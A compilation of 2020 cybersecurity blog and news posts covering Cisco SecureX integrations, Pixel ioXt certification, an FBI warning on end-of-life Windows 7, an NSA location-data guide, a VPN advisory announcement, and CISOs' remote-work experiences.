  • Premium Services. Parents working from home are not expected to be IT or Security experts, so now’s the time to ensure professional help is around when you need it by signing up for one of Trend Micro’s premium service packages for help configuring, troubleshooting, optimizing, and disinfecting your devices if they get infected.

Maintaining your family’s security and privacy on all their devices during the coronavirus lockdown above all means changing your mindset, to take into account the mix of work and play in the household during the “new normal.” Use these tips and tools during lockdown and you’ll be well on your way to ensuring you and your family’s safety from malicious viruses—both digital and natural.

The post Top Tips For Home Cybersecurity And Privacy In A Coronavirus-Impacted World (part 2) appeared first on .

SecureX threat response Ecosystem

A few months ago, Cisco Security announced the SecureX platform with two core capabilities: threat response and orchestration. In that announcement, we brought attention to nearly two dozen integrations with SecureX threat response, formerly Cisco Threat Response.


With SecureX, you can accelerate threat hunting and incident response by seamlessly integrating SecureX threat response and your existing security technologies. You have the flexibility to bring your tools together, whether it’s with integrations that are built-in, pre-packaged, or custom. If you have Cisco Stealthwatch, Firepower, AMP for Endpoints, Umbrella, Email Security, Web Security, or Threat Grid; SecureX threat response is included with your license at no additional cost.

  • Connect your entire security stack–Cisco or otherwise–for faster investigations
  • Aggregate and correlate security context from multiple technologies in one view
  • Get the most out of your existing security investments, including from our technology partners

The SecureX platform has three categories of integrations:

  • Built-in integrations are developed by Cisco, or select technology partners, for customers to instantly configure. These typically are integrations where SecureX threat response produces threat intelligence to be visualized in the partners’ user interface. Though there are some exceptions like VirusTotal or when a partner builds the threat response APIs into their core code.
  • Pre-packaged integrations are developed by Cisco or technology partners for customers to use ready-made scripts that they install into cloud infrastructure, which they maintain. The time spent is minimized, as you don’t need to learn any APIs or write any code. These typically are SecureX threat response modules that produce threat intelligence to be visualized in SecureX. These are available modules in SecureX.
  • Custom integrations can be created by customers leveraging Cisco and technology partners’ open APIs. The time spent on integration is reduced by using our resources on DevNet to quickly get started, including training, links to code on GitHub and extensive use case and workflow documentation on ReadtheDocs.

We made a promise in late April: “… we’re speeding up detection, investigation, and remediation across your environment with many more pre-packaged integrations. We are pleased to announce that time is now.

Built-in integrations

Google VirusTotal*

VirusTotal is a free service that inspects items with over 70 antivirus (AV) scanner and URL/domain blocked list services. The threat response VirusTotal module allows you to query a URL, IP address, domain or file hash, in the incident response process, to gain additional context from the AV scanners and services as to the threats associated with the sample. You can register for a free VirusTotal account and receive an API key. Threat Response uses the API key on your behalf to include VirusTotal query results in any investigation.

IBM Security QRadar SIEM

The threat response extension provides the capabilities to right-click pivot from an IP Address in QRadar into an investigation in the Threat Response console and hover over 100+ property field types and query threat response for Verdicts.

Polarity Data Awareness

The threat response integration allows Polarity to search the Threat Response Enrich API to return information about various indicator types.

ServiceNow Security Operations

ServiceNow Security Operations (Security Incident Response and Threat Intelligence) can leverage the Verdicts, Refer and Response capabilities provided by threat response to assist the security analyst in their investigation workflow. This enables the analyst to take response actions from within ServiceNow to remediate threats.

Splunk Enterprise Security

SecureX Threat Response Add-On for Splunk provides a custom search command allowing users to query threat response for targets and verdicts from observables within a Splunk instance.

Splunk Phantom

Phantom threat response plug-in enables a user, or an automated playbook/action, initiates a query to threat response for Verdicts or Sightings of an observable and render in a table.

Swimlane Security Operations Management

Swimlane threat response plugin allows connection to the Threat Response API, to extract and enrich observables.

TheHive Project – Cortex Analyzers*

The threat response analyzer connects to TheHive, a scalable, open source and free Security Incident Response Platform, tightly integrated with MISP (Malware Information Sharing Platform), designed to make life easier for SOCs, CSIRTs, CERTs and any information security practitioner dealing with security incidents that need to be investigated and acted upon swiftly.

Pre-packaged integrations

To utilize the pre-packaged integrations, you must first deploy a cloud infrastructure to implement the threat response serverless relay API. We created a step-by-step installation guide and recorded tutorials to make it easier and code on GitHub, that is pre-configured for AWS Lamba. The API itself is just a simple Flask (WSGI) application which can be easily packaged and deployed as an AWS Lambda Function, working behind an AWS API Gateway proxy using Zappa. An already deployed Relay API (e.g., packaged as an AWS Lambda Function) can be pushed to threat response as a Relay Module using the Threat Response Relay CLI. The threat response python API module is available with pip install.

Abuse IPDB*

Threat response module for the investigation of IPs and URLs. AbuseIPDB supports both IP and IPv6. API limits: 1000 / day. Returned Entities: Verdicts, Judgement, Sighting, Indicator.

AlienVault OTX*

Threat Response module to query AlienVault OTX for observables (IP, IPV6, domain, hash values) and return Sightings and Indicators from the “Pulses” in AlienVault. Pivot to AlienVault OTX UI via refer actions.


Threat Response module for investigations of IPs or domains and receives Sightings response from APIVoid blocklist aggregation.

Auth0 Signals*

Threat Response module for investigation of IPs. Query Auth0 Signals for an IP address to find out if it is on any blocklists. Return verdicts for the IP based on the scoring provided. Returns Open-Source Intelligence (OSINT) context from over 100 curated and normalized blocklists.


SecureX threat response module for investigation of IP addresses. SecureX receives a Verdict response from C1fApp. Malicious Verdict as the observable is found on a block list and the Indicator is the feed on which it was seen.

CyberCrime Tracker*

Threat response module for the investigation for verdicts on IPs and URLs, receiving Cybertracker Verdicts and Judgements.

Cyberprotect Threatscore*

Threat response module for the investigation of IPs, domains, hashes and file names. Returned Entities: Verdicts and Judgements.

Farsight Security

The Farsight Security SecureX threat response module enables a user to initiate an investigation for verdicts on IPs and Domains. Farsight Security DNSDB provides enrichment data about IP Addresses (IP and IPv6) and Domains. Certified as Cisco Compatible.

Gigamon ThreatINSIGHT

The Gigamon ThreatINSIGHT module enables threat response to query network and threat data for Sightings of observables from the Gigamon intelligence. Gigamon completed the Cisco Compatible Certification for the integration and published a joint solution brief.

Google Chronicle

The Google Chronicle threat response module enables queries for Sightings of observables (IP, domain, hash, file name, file path) within the SIEM.  Also, List Assets, obtain IOC Details, to List Alerts within a time range, and to List IOCs within a time range.

Google Safe Browsing

Threat response module for the integration of Google Safe Browsing; a blacklist service provided by Google that provides lists of URLs for web resources that contain malware or phishing content. The Google Chrome, Safari, Firefox, Vivaldi, and GNOME Web browsers use the lists from the Google Safe Browsing service for checking pages against potential threats, and this integration enables the user to have the blacklist intelligence in threat response.

Have I Been Pwned*

Threat response module for the investigation of a SHA256. The module adds context around a compromised email and username associated with that email and context about a user for an environment. If Cisco Email Security Appliance module is enabled, then it returns that this SHA256 has been sent to identified email addresses, as has been seen in the data breaches. Small monthly for subscription.

Microsoft Graph Security

The Microsoft Graph Security module queries for Sightings of an observables (IP, domain, hash, file name, file path) within Graph Security Alerts. Threat Response can access large volumes of Microsoft centric data as well as data from 3rd parties in a standardized format.


Threat response module for the investigation of URLs. Returns the Verdict.

Qualys IOC

The Quays Indication of Compromise threat response module is utilized for the investigation of Sightings of supported observables on Targets. Supports hashes (MD5, SHA256) of the file image on disk, the image on disk for a running process, and the image on disk for loaded modules. Also, File Name (Process Name), IP, Domain, File path and Mutex.

Radware WAF and DDoS

SecureX threat response modules for IP address(es) investigation, for both WAF and DDoS abusive activity, along with Indicators for those Sightings. Certified as Cisco Compatible.


Query SecurityTrails with this module, for enrichment data about Domains and IP Addresses (IP and IPv6). Pivot to Security Trails UI to search for Domains and IP Addresses (IP and IPv6).

ServiceNow Security Operations

The ServiceNow module in Threat Response, enables ServiceNow to be a data source when the analyst starts an investigation in the Threat Response UI or via the API. This enables the analyst to query ServiceNow for historical context from previous incidents that involved a given observable.


SecureX threat response Pivot / Respond menu on an IP address. Shodan is a search engine for Internet-connected devices. Web search engines, such as Google and Bing, are great for finding websites.

Signal Sciences Web Application Protection

Signal Sciences is a leading web application security company, with a next-gen web application firewall (WAF) and runtime application self-protection (RASP) solution. Through the threat response integration developed by Signal Sciences, your Security Operations team will have immediate visibility into attacks across all web application workloads With the integration, you can take immediate action. Certified as Cisco Compatible.


The SecureX threat response SpyCloud module empowers users to initiate an investigation into a SHA256. The module adds context around a compromised email and username associated with that email and context about a user for an environment. If Cisco Email Security module is enabled, then it returns that this SHA256 has been sent to e.g. these email addresses have been seen in the data breaches.

ThreatQuotient Security Operations Platform

ThreatQuotient periodically posts Judgements and Verdicts of observables to Cisco Threat Intelligence API, for visualization in threat response.  In addition, ThreatQ uses threat response as an enrichment source for threat intelligence.*

SecureX threat response module to submit URL(s) into for threat intelligence context.

The SecureX ecosystem will continue to grow, with additional integrations in development now, both by Cisco and our technology partners. You and your organization are also empowered to build your own. The power of the SecureX platform is yours.

Acknowledgements: My thanks to Michael Auger, manager of ecosystem integrations, and my partner in this endeavor. Michael designed the relay architecture that made rapid development possible, between SecureX and technology partners. Michael led a team of a dozen developers, program managers and quality assurance engineers, and worked closely with partners’ engineering teams; to build 27 integrations with 24 partners for the initial SecureX release. Well done!!

*Community/open source



The post SecureX threat response Ecosystem appeared first on Cisco Blogs.

Pixel 4a is the first device to go through ioXt at launch

Trust is very important when it comes to the relationship between a user and their smartphone. While phone functionality and design can enhance the user experience, security is fundamental and foundational to our relationship with our phones.There are multiple ways to build trust around the security capabilities that a device provides and we continue to invest in verifiable ways to do just that.

Pixel 4a ioXt certification

Today we are happy to announce that the Pixel 4/4 XL and the newly launched Pixel 4a are the first Android smartphones to go through ioXt certification against the Android Profile.

The Internet of Secure Things Alliance (ioXt) manages a security compliance assessment program for connected devices. ioXt has over 200 members across various industries, including Google, Amazon, Facebook, T-Mobile, Comcast, Zigbee Alliance, Z-Wave Alliance, Legrand, Resideo, Schneider Electric, and many others. With so many companies involved, ioXt covers a wide range of device types, including smart lighting, smart speakers, webcams, and Android smartphones.

The core focus of ioXt is “to set security standards that bring security, upgradability and transparency to the market and directly into the hands of consumers.” This is accomplished by assessing devices against a baseline set of requirements and relying on publicly available evidence. The goal of ioXt’s approach is to enable users, enterprises, regulators, and other stakeholders to understand the security in connected products to drive better awareness towards how these products are protecting the security and privacy of users.

ioXt’s baseline security requirements are tailored for product classes, and the ioXt Android Profile enables smartphone manufacturers to differentiate security capabilities, including biometric authentication strength, security update frequency, length of security support lifetime commitment, vulnerability disclosure program quality, and preloaded app risk minimization.

We believe that using a widely known industry consortium standard for Pixel certification provides increased trust in the security claims we make to our users. NCC Group has published an audit report that can be downloaded here. The report documents the evaluation of Pixel 4/4 XL and Pixel 4a against the ioXt Android Profile.

Security by Default is one of the most important criteria used in the ioXt Android profile. Security by Default rates devices by cumulatively scoring the risk for all preloads on a particular device. For this particular measurement, we worked with a team of university experts from the University of Cambridge, University of Strathclyde, and Johannes Kepler University in Linz to create a formula that considers the risk of platform signed apps, pregranted permissions on preloaded apps, and apps communicating using cleartext traffic.

Screenshot of the presentation of the Android Device Security Database at the Android Security Symposium 2020

In partnership with those teams, Google created Uraniborg, an open source tool that collects necessary attributes from the device and runs it through this formula to come up with a raw score. NCC Group leveraged Uraniborg to conduct the assessment for the ioXt Security by Default category.

As part of our ongoing certification efforts, we look forward to submitting future Pixel smartphones through the ioXt standard, and we encourage the Android device ecosystem to participate in similar transparency efforts for their devices.

Acknowledgements: This post leveraged contributions from Sudhi Herle, Billy Lau and Sam Schumacher

Preparing for the Unpredictable: Imagining a Data Security and Privacy Platform

With stricter privacy regulations, evolving customer expectations, and growing work-from-home demands, organizations need a simple way to know, see, and manage their data. Luckily, we’ve got a few ideas. 

Security is all about the data. Protecting data is the reason companies invest in security infrastructure and services like threat detection, data loss prevention, strong multi-factor authentication, etc. But where there should be a data visibility and management layer, instead there’s a gaping hole.

As a distinguished engineer working in the Security Business Group’s Office of the CTO, I’m part of a team responsible for planning the future of Cisco’s security offerings. One of our initiatives is imagining a data security and privacy platform to give organizations visibility and control of sensitive data like personally identifiable information (PII). After 32 years of working in the cybersecurity industry, this is very exciting for me.

Business and society demand trust and privacy

Privacy is very much front and center for decision makers. In the 2019 Cisco Data Privacy Benchmark Study, 87% of respondents (up from 65% in 2018) said that customer questions about data privacy delay sales. Companies face hefty fines if they don’t comply with regulations, like the EU’s General Data Protection Regulation (GDPR) and California Consumer Privacy Act (CCPA). Continuing work from home means more data lives on endpoints outside an organization’s control. And increased data variety (think virtual meeting information, contact tracing, smartphone videos, etc.), volume, and velocity make it harder for chief information security officers (CISOs) to be certain of what data is stored and where it is flowing.

Business aside, privacy and trust are essential for a functioning society. A digital economy can succeed only if it’s trusted. At Cisco we think of privacy as a fundamental human right. It’s part of our mission statement: “To inspire new possibilities by reimagining your applications, securing your data, transforming your infrastructure, and empowering your teams.”

Narrowing in on the problem

My team works with customers and our own IT organization to better understand data security and privacy challenges and imagine what a solution might look like. Our customers’ wish list can be distilled down to three requirements: awareness (know your data), visibility (see your data), and management (control your data). With that in mind, we’ve put some ideas together to help address the most critical requirements.

1. Comprehensive data map

Many CISOs say they struggle with two questions:  1. Where are the data stores? 2. What information needs to be protected? These are tough questions to answer when more than half of the data is unseen—the so-called “databerg.” If you don’t know what data you have, you don’t have a sense of the risk if data is leaked or compromised.

The data security platform we’re imagining might produce a real-time data map based on query n-tuples showing where data is stored, the sensitivities, where it’s shared, how long it’s retained, and how it’s used.  For example, a CISO might want a visual of the data centers and geographies where employee PII is stored.

2. The power of combined context

We are exploring the concept of creating multiple, rich contextual stores that include applications, users/identities, and services along with datastores and data files. Some of this rich context is already available through existing Cisco technologies such as Advanced Malware Protection, Tetration, Umbrella, and Identity Services Engine. We’re also considering plug-and-play integration with common business platforms, such as Salesforce, Microsoft Office 365, and Workday.

Going further, we are investigating the possibilities of combining rich infrastructure telemetry, applications telemetry, and file metadata to build a comprehensive visibility and control fabric. In addition to helping customers make the journey from databerg to data map, we want to give them the power to visualize risk, control access, and assure compliance. 

3. Simple user experience

The people who need to know, see, and manage data security and privacy include data stewards, data owners, and privacy ops specialist. Some are technical, some aren’t. To keep the user experience simple, we envision a single user interface, like Cisco SecureX, with different dashboards tailored to the user’s role. In our current thinking, if you’re a data steward you’d be able see a data map of where all the sensitive data is stored by region. If you’re a data owner, you’d be able to create policies on who can see data and where they can move it. If you’re in privacy operations, you’d be able to fulfill data subject access requests (DSARs) as required by GDPR and CCPA.

Bringing all privacy activities onto one platform

As I write this, we’re working to provide more visibility into metrics from our own solutions, plan new initiatives, and explore partnerships with other companies. Our end goal is bringing everything you need to know, see, and manage sensitive data onto one platform. It’s good for business, good for individuals, and good for society.

That’s a glimpse into our thinking. We’re interested in yours. What would you like to see in a privacy platform? Please let us know in the comments below.

The post Preparing for the Unpredictable: Imagining a Data Security and Privacy Platform appeared first on Cisco Blogs.

This Week in Security News: Robots Running the Industrial World Are Open to Cyber Attacks and Industrial Protocol Translation Gone Wrong

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. Based on research that Trend Micro released during Black Hat USA this past week, read about how some industrial robots have flaws that could make them vulnerable to advanced hackers, as well as the risks related to protocol gateways and how to secure these devices.


Read on:

Unveiling the Hidden Risks of Industrial Automation Programming

The legacy programming environments of widely used industrial machines could harbor virtually undetectable vulnerabilities and malware. Trend Micro’s recent security analysis of these environments, presented at Black Hat USA 2020 this week, reveals critical flaws and their repercussions for smart factories.

Top 6 Cybersecurity Trends to Watch for at Black Hat USA 2020

At this year’s Black Hat USA 2020 conference, some of the top trends expected to surface include ransomware, election security and how to protect a remote workforce. Trend Micro’s vice president of cybersecurity, Greg Young, said, “Cybercrime increased rather than slowed down due to the pandemic, as we saw 1 billion more threats blocked in the first half of 2020 compared to 2019.”

Lost in Translation: When Industrial Protocol Translation Goes Wrong

Also presented this week at Black Hat USA, this recent research from Trend Micro examines the risks related to protocol gateways, the possible impact of an attack or wrong translation, and ways to secure these devices.

‘Alarming’ Rate of Cyberattacks Aimed at Major Corporations, Governments and Critical Infrastructure Amid COVID-19: Report

As COVID-19 cases around the U.S. continue to rise, the International Criminal Police Organization (INTERPOL) says that governments are seeing an “alarming” rate of cyberattacks aimed at major corporations, governments and critical infrastructure.

Water Nue Phishing Campaign Targets C-Suite’s Office 365 Accounts

A series of ongoing business email compromise (BEC) campaigns that uses spear-phishing schemes on Office 365 accounts has been seen targeting business executives of more than 1,000 companies globally since March. The campaigns target senior positions in the United States and Canada, and the fraudsters, dubbed “Water Nue” by Trend Micro, primarily target accounts of financial executives to obtain credentials for further financial fraud.

Robots Running the Industrial World Are Open to Cyber Attacks

Industrial robots are now being used to assemble everything from airplanes to smartphones, using human-like arms to mechanically repeat the same processes over and over, thousands of times a day with nanometric precision. But according to a new report from Trend Micro, some robots have flaws that could make them vulnerable to advanced hackers, who could steal data or alter a robot’s movements remotely.

Patch Fail Led to Password Leak of 900 VPN Enterprise Servers

Applying a security update to a CVE released more than a year ago could have prevented a hacker from publishing plaintext usernames and passwords as well as IP addresses for more than 900 Pulse Secure VPN enterprise servers. This vulnerability, CVE 2019-11510, was one of the several recently exploited vulnerabilities by Russia’s Cozy Bear, APT29, in an attempt to steal COVID-19 vaccine research.

U.S. Offers Reward of $10M for Info Leading to Discovery of Election Meddling

The U.S. government is concerned about foreign interference in the 2020 election, so much so that it will offer a reward of up to $10 million for anyone providing information that could lead to tracking down potential cybercriminals aiming to sabotage the November vote.

TeamViewer Flaw Could be Exploited to Crack Users’ Password

A high-risk vulnerability in TeamViewer for Windows could be exploited by remote attackers to crack users’ password and, consequently, lead to further system exploitation. CVE-2020-13699 is a security weakness arising from an unquoted search path or element – more specifically, it’s due to the application not properly quoting its custom URI handlers – and could be exploited when the system with a vulnerable version of TeamViewer installed visits a maliciously crafted website.

Black Hat: How Your Pacemaker Could Become an Insider Threat to National Security

Implanted medical devices are an overlooked security challenge that is only going to increase over time. The emerging problem of vulnerabilities and avenues for attack in IMDs was first highlighted by the 2017 case of St. Jude (now under the Abbott umbrella), in which the US Food and Drug Administration (FDA) issued a voluntary recall of 465,000 pacemakers due to vulnerabilities that could be remotely exploited to tamper with the life-saving equipment.

What was your favorite session from Black Hat USA this week? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Robots Running the Industrial World Are Open to Cyber Attacks and Industrial Protocol Translation Gone Wrong appeared first on .

I’m Partnering with NordVPN as a Strategic Advisor

I'm Partnering with NordVPN as a Strategic Advisor

I love security. I love privacy. Consequently, it will come as no surprise that I love tools that help people achieve those objectives. Equally, I have no patience for false promises, and I've been very vocal about my feelings there:

VPNs are a great example of where a tool can be used to enhance security and privacy but often, they fall short of delivering on the promise. When you use a VPN, you're trusting a third party with your traffic and even in an increasingly "encrypted by default" web, you're taking a leap of faith with who you choose to route your bytes.

A few months ago, NordVPN sponsored this blog and we got to chatting. I had a long call with Tom Okman (that link is a good read on their background) who co-founded the company in 2012 and I expressed my dismay at the trustworthiness (or lack thereof) of so many VPNs in the market. This was before the embedded tweet above but well after I'd written about dodgy VPNs:

Whoever can see your traffic - be that your local ISP or the VPN provider you decide to use - has an enormous responsibility and you're placing a huge amount of trust in them

I really pressed Tom on the trust piece - why should people trust NordVPN? The promise of "no logs" in particular is a favourite of VPN providers yet evidently, the reality doesn't always meet the promise. Turns out they'd just had their second PWC audit to verify their claims and came out clean which is a pretty solid way of demonstrating their commitment to privacy. Having a Big Four do any sort of formal audit wouldn't have been a cheap experience and the fact Tom and co recognised the value, not just in making claims but proving them too, carries a lot of weight.

But there were also aspects of NordVPN I told Tom needed work, especially around their messaging in marketing material. Look, I get it, marketing people like to embellish but, in my view, there were occasions where that went beyond what you could reasonably expect a VPN to do. You can't on the one hand put all this work into trust and transparency and then on the other hand convey messaging that impacts trust and transparency! And yes, I have strong views on these things 😊

So Tom asked me if I'd like to become an adviser to NordVPN and invest a bit more time than just a telephone call sharing these ideas. I thought about it for a while, kept using the product, liked it, realised it's not like I'm travelling anywhere anytime soon so I've got the time and gave him a thumbs up. So here we are. I'll be devoting some cycles each month to work with NordVPN on their tools and messaging with a view to helping them make a great product even better. Yes, it's a commercial relationship but no, I won't be employed by them, will remain independent and will continue to do all the things I usually do anyway (except travel, of course).

NordVPN has done a great job getting their product out to 14 million people worldwide and frankly, that's a pretty impressive number for a tool your average consumer has no idea about. I'm looking forward to working with them on the product, reaching more people and having a greater positive impact on digital privacy.

What is application-first security?

Securing applications is the #1 area to invest for your future. Your applications run your digital business. It is protecting the world’s economy. It is securing our family businesses, schools, corporations, our means of daily activities. So why hadn’t I heard of what is application security before 6 months ago?

I began to learn about application-first security as the world started needing it most. In 2020, security has been even more important to customers and partners because hackers are jumping at the opportunity to attack (source).

Applications are part of everyday life. We use applications on our phones and laptops, and businesses use them to enable services, store private customer information and more. There are endless uses for applications, and as more are developed and updated everyday, cybersecurity threats assemble to take down the organizations that depend on applications.

Application-first security is the idea that applications are critical to running businesses and operations – they must be secured because they drive business value, but they run everywhere and are constantly being updated. The nature of applications is what makes them hard to secure. There are 3 stages in the application life cycle: development, deployment and testing, and runtime. There is a lot to think about when securing applications – so how do you chase down your applications to make sure that even as they move to the cloud, your business is still secure?

Simple. Cisco has a suite of products that intelligently address application-first security: Tetration, Stealthwatch Cloud, Duo Beyond and AppDynamics.

Applications need workloads to be secured separately in case of a breach in your cloud infrastructure. Tetration protects your application workloads using policy enforcement and micro-segmentation, which prevents lateral movement between applications in a data center or in the cloud.

Application security requires threat visibility and detection to quickly warn you about possible breaches. Stealthwatch Cloud gives your business the ability to respond to threats using an alert system and machine learning, providing deep insights.

Your applications need to be securely accessed by employees, without possible threats entering your cloud environment. Duo Beyond enables your workforce to stay compliant with your organization’s security postures.

Your applications require regular behavioral analysis to ensure threats are not present in your public and private cloud environments. AppDynamics offers application performance monitoring, reducing risk by empowering your organization to detect and prevent breaches.

Cisco’s solution is the ultimate answer to application security. By putting your organization’s applications first, you ensure the safety of the business’s most valued assets.

Learn more about Cisco Application-First Security

The post What is application-first security? appeared first on Cisco Blogs.

FBI is warning of cyber attacks against Windows 7 systems that reached end-of-life

The FBI warned private industry partners of risks impacting companies running Windows 7 after the Microsoft OS reached the end of life on January 14.

The Federal Bureau of Investigation is warning companies running Windows 7 systems of the greater risk of getting hacked because the Microsoft OS has reached the end of life on January 14.

Early this week, the FBI has sent a private industry notification (PIN Number 20200803-002) to partners in the US private sector.

“The FBI has observed cyber criminals targeting computer network infrastructure after an operating system achieves end of life status,” reads the the FBI’s PIN.

“Continuing to use Windows 7 within an enterprise may provide cyber criminals access in to computer systems. As time passes, Windows 7 becomes more vulnerable to exploitation due to lack of security updates and new vulnerabilities discovered.”

“With fewer customers able to maintain a patched Windows 7 system after its end of life, cyber criminals will continue to view Windows 7 as a soft target,”

Feds urge organizations to upgrading their systems running Windows 7 to newer versions for which the IT giant is still providing security updates.

“Upgrading operating systems to the latest supported version. Ensuring anti-virus, spam filters, and firewalls are up to date, properly configured, and secure.” continues the PIN.

Microsoft still allows its Windows 7 users to upgrade to Windows 10 for free, but sometimes the underlying hardware doesn’t support the free upgrade.

The FBI cited the case of previous Windows XP migration, many systems that were not upgraded remained exposed to a significant number of attacks.

“Increased compromises have been observed in the healthcare industry when an operating system has achieved end of life status. After the Windows XP end of life on 28 April 2014, the healthcare industry saw a large increase of exposed records the following year,” the FBI said.

The experts explained that threat actors could exploit multiple known vulnerabilities impacting Windows 7 to compromise the systems running the popular Microsoft OS.

For many of these flaws, it is possible to find online working exploits. such as the EternalBlue and BlueKeep exploits

The FBI added that several companies have yet to patch its systems and urged them to apply the upgrade, the agency also provided the following recommendations:

  • Ensuring anti-virus, spam filters, and firewalls are up to date, properly configured, and secure.
  • Auditing network configurations and isolate computer systems that cannot be updated.
  • Auditing your network for systems using RDP, closing unused RDP ports, applying two-factor authentication wherever possible, and logging RDP login attempts.

Pierluigi Paganini

(SecurityAffairs – hacking, Windows)

The post FBI is warning of cyber attacks against Windows 7 systems that reached end-of-life appeared first on Security Affairs.

Cyber Defense Magazine – August 2020 has arrived. Enjoy it!

Cyber Defense Magazine august 2020 Edition has arrived. We hope you enjoy this month’s edition…packed with over 147 pages of excellent content.

Learn from the experts, cybersecurity best practices

Find out about upcoming information security related conferences, expos and trade shows.  Always free, no strings attached.







Do you like Yumpu?  Here’s a Yumpu version:

Enjoy and Thank You for Joining Us!
Let’s get one step ahead of the next threat,

Cyber Security Magazine
with a Consumer Focus (B2C)***NEW***
Don’t miss out: two unique webinars each month….

Cyber Defense Webinars

Please visit CYBER DEFENSE TV and watch our latest interviews…We have 80+ NEW INTERVIEWS BEING UPLOADED THIS MONTH!!!Please visit Cyber Defense Radio for streaming and downloadable podcasts…THE BLACK UNICORN REPORT FOR 2020 IS NOW ONLINEHighlighted Sponsors This Month:

RSA CONFERENCE 2020Want to sponsor our eMagazine? 

Checkout our 
media kit and reach out to

Pierluigi Paganini

(SecurityAffairs – hacking, cyber defense magazine)

The post Cyber Defense Magazine – August 2020 has arrived. Enjoy it! appeared first on Security Affairs.

NSA releases a guide to reduce location tracking risks

The United States National Security Agency (NSA) is warning of risks posed by location services for staff who work in defence or national security.

The United States National Security Agency (NSA) published a new guide to warn of the risks posed by location services for staff who work in defence or national security.

The guide, titled “Limiting Location Data Exposure” warn of geolocation features implemented by smartphones, tablets, and fitness trackers.

“Mobile devices store and share device geolocation data by design. This data is essential to device communications and provides features—such as mapping applications—that users consider indispensable. Mobile devices determine location through any combination of Global Positioning System (GPS) and wireless signals (e.g., cellular, wireless (Wi-Fi®1 ), or Bluetooth®2 (BT)).” reads the NSA’s guide. “Location data can be extremely valuable and must be protected. It can reveal details about the number of users in a location, user and supply movements, daily routines (user and organizational), and can expose otherwise unknown associations between users and locations.”

The agency reminds its staff that location data are extremely valuable information that must be properly protected. It can reveal the position of the individuals, user and supply movements, and daily routines, among others. The exposure of such data is especially critical for personnel of intelligence agencies and defense.

The guide pointed that such location devices may have been designed to store or transmit location data even when location settings or all wireless capabilities have been disabled.

The guide also highlights that location data from a mobile device can be obtained even without provider cooperation. An attacker could use commercially available rogue base stations to easily obtain real-time location data and track targets.

“This equipment is difficult to distinguish from legitimate equipment, and devices will automatically try to connect to it, if it is the strongest signal present.” continues the guide.

Mitigations could help to reduce, but do not eliminate, location tracking risks in mobile devices. In many cases, users rely on features disabled by such mitigations, making such safeguards impractical.

The guide includes multiple mitigations, including turning off radios when not in use, disabling features like “Find my Phone,” and using a VPN,

The experts also recommend disabling advertising permissions to the greatest extent possible by limiting ad tracking and resetting the advertising ID for the device on a regular basis (at least on a weekly basis).

“While it may not always be possible to completely prevent the exposure of location information, it is possible—through careful configuration and use—to reduce the amount of location data shared,” the guide concludes. “Awareness of the ways in which such information is available is the first step.”

Pierluigi Paganini

(SecurityAffairs – NSA, location services)

The post NSA releases a guide to reduce location tracking risks appeared first on Security Affairs.

Experiences from Cybersecurity Leaders in Extraordinary Times: Adjustments and Outcomes

The sudden move to telework this year imbued the word “challenge” with new meaning for security executives. Within a matter of days and weeks, many of these leaders had to figure out how they could rework their employers’ security policies in such a way that supported a massive shift to working from home. This period required significant ingenuity and unprecedented forward thinking, not to mention a deep understanding of their employers’ overall security needs.

We at Cisco wanted to find out the types of adjustments that security executives made in the wake of this challenge, as well as how these changes ultimately panned out for them. To get an idea of all this, we spoke to more than a dozen security leaders about their individual experiences. Here’s what some of them had to say.


Mick Jenkins MBE | Chief Information Security Officer at Brunel University London

@FailsafeQuery | (LinkedIn)

Having dealt in risk management all my life, often in life and death situations, the mantras came at me like a flood over the last few months: ‘Never let a good crisis go to waste,’ ‘Act early, move fast, and stay low,’ ‘Improvise, adapt, overcome.’ But there was only one mantra

that I knew would stand the test of an enduring campaign – a mantra often cited by my long-time mentor: ‘Always keep a half pint of goodwill with your people, you’ll never know when you’ll need to call upon it in a crisis.’

Crises are all about people and how people can react smartly to reduce any potential damage and harm. That’s why ‘train hard, fight easy’ was always a core principle for me, throughout a career full of crises.

We needed to do three major things: 1) Equip staff and students with the appropriate work tools, 2) overlay sensible security measures, and 3) train the workforce on the threats, then message them again and again. Engagement was key – a gentle ‘drip, drip’ of solid and sensible advice to keep their homes cyber safe.

Our story wasn’t a story of petals and roses, there have been some serious difficulties and lots of frustration – but if you work that well, and ‘hog the pain,’ it eventually leads to the fog lifting and people making a critical difference.

With great teamwork, and great leadership, magnificent things can happen. Never let fear get in the way of your dreams.


Sandy Dunn | Chief Information Security Officer, Large Insurance Provider, Idaho

@subzer0girl | (LinkedIn)

The unknown for our organization working remotely was a cultural concern instead of a technical readiness concern. Our organization has had the technical ability to work remotely in place for a while, but since we are a smaller, single state entity, the culture was accustomed to having meetings and serious discussions in person.

Prior to 2020, it was very common for people outside of IT to not even sign into a messaging client. You were forced to call, email, or walk to their desk to get a simple answer to a simple question. Working remotely has encouraged people who weren’t as familiar or comfortable with messaging and group chats to grow their technical acumen and adopt different communication practices.

Looking back, I don’t really have anything I think we should have done differently, but I am trying to navigate ongoing concerns with not being able to be with people in person.

Individuals all process high stress / high uncertainty differently, and since I’m not able to connect with my team in person, I’m not able to really “see” how everyone is doing. To remediate being unable to observe people in person, the team is making an extra effort to do mental health check-ins with each other, watching each other for symptoms of burnout or high stress, and adding video to our online meetings.


Quentyn Taylor | Director of Information Security at Canon for EMEA

@quentynblog | (LinkedIn)

I think the main thing to remember is that whilst this way of working feels new, it is only the volume of “home work” that is new. Many companies have always had people working from home from different locations and from on the road, and so to believe that this “new” way is totally different to how you were working before is probably wrong.

With that being said, there are two kinds of companies at this moment in time: those that have their email and collaboration tools in the cloud and those that are frantically trying to get the email and collaboration tools in the cloud.

So, my practical advice would be to ensure that you focus on getting the basics right. That means making sure that you have multi-factor authentication implemented to control access to all of your cloud resources. Making sure that you understand what your perimeter looks like. With everyone now working from home, your perimeter just got a lot bigger. Ensure that you have a way of patching your client machines even though they’re not on your network anymore. Alternatively, design your working practices so that you don’t need to worry about machines at the other end and whether they are patched.


Angus Macrae | Head of Cyber Security

@AMACSIA | (LinkedIn)

From a technology perspective, whilst cloud services were pretty much born for this remote work world, most organizations are still in a hybrid way of doing things and will still run legacy, in-house services and systems traditionally accessed on-premise only. As few would have anticipated needing to grant large-scale remote access to such services at short notice, few would have had all the tools and capacity ready to do so both reliably and securely. This requires thinking on one’s feet and rapid, high-pressured upgrading and rearchitecting of various components and processes.

